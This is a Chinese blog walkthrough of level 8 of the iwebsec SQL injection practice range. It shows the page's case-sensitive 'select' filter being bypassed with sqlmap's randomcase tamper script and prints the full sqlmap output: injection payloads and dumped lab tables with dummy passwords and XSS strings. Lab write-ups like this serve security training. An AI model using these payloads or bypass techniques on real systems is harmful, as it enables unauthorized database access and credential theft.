iwebsec靶场 SQL注入漏洞通关笔记8- 大小写过滤注入

系列文章目录

iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入（宽字节注入）_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记3- bool注入（布尔型盲注）_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入（时间型盲注）_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入（报错型盲注）_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过_mooyuan的博客-CSDN博客

 

目录

系列文章目录

前言

一、源码分析

二、sqlmap注入

1.注入命令

2.完整交互

总结

---

前言

打开靶场，url为 http://192.168.71.151/sqli/08.php?id=1 如下所示

一、源码分析

如下所示，SQL语句与前几关一样，调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入，并且对参数id做了select关键字过滤。

 select过滤的相关源码如下所示

if (preg_match('/select/', $_GET["id"])) {
		die("ERROR");
	}

也就是说源码对完整的select语句进行了过滤，那么可以通过双写法seselectlect，或者大小写等多做方法进行绕过，应本关卡的名称为大小写绕过，使用大小写方法进行绕过

二、sqlmap注入

1.注入命令

使用sqlmap的绕waf脚本 randomcase.py，将随即大小写来绕过源码对select关键字的过滤

sqlmap -u http://192.168.71.151/sqli/08.php?id=1  --current-db --dump --batch  --tamper randomcase.py

举例，randomcase.py脚本的作用是随机大小写 比如说Input: INSERT那么Output: InsERt

如上所示使用大小写绕过方法的渗透脚本已经成功

2.完整交互

kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/08.php?id=1  --current-db --dump --batch  --tamper randomcase.py
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[)]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                  
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:17:08 /2022-11-25/

[00:17:08] [INFO] loading tamper module 'randomcase'
[00:17:08] [INFO] resuming back-end DBMS 'mysql' 
[00:17:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5893=5893) THEN 1 ELSE (SELECT 1790 UNION SELECT 4808) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6156 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (ELT(6156=6156,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1955 FROM (SELECT(SLEEP(5)))eSpl)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x7178766a71,0x44567654776c4e75545846714e696472486564726173526948545156666b44555761527443414868,0x7171787871),NULL,NULL-- -
---
[00:17:08] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:17:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[00:17:08] [INFO] fetching current database
[00:17:08] [WARNING] reflective value(s) found and filtering out
current database: 'iwebsec'
[00:17:08] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[00:17:08] [INFO] fetching current database
[00:17:08] [INFO] fetching tables for database: 'iwebsec'
[00:17:08] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[00:17:08] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+

[00:17:09] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[00:17:09] [INFO] fetching columns for table 'user' in database 'iwebsec'
[00:17:09] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[00:17:09] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[00:17:09] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[00:17:09] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[00:17:09] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[00:17:09] [INFO] fetching columns for table 'users' in database 'iwebsec'
[00:17:09] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[00:17:09] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[00:17:09] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[00:17:09] [WARNING] your sqlmap version is outdated

[*] ending @ 00:17:09 /2022-11-25/

---

总结

SQL注入主要分析几个内容

（1）闭合方式是什么？iwebsec的第8关关卡为数字型，无闭合

（2）注入类别是什么？这部分是普通的数字型注入，使用union法即可注入成功

（3）是否过滤了关键字？很明显通过源码，iwebsec的第08关卡过滤了select关键字

了解了如上信息就可以针对性进行SQL渗透，使用sqlmap工具渗透更是事半功倍，以上就是今天要讲的数字型注入内容，初学者建议按部就班先使用手动注入练习，再进行sqlmap渗透。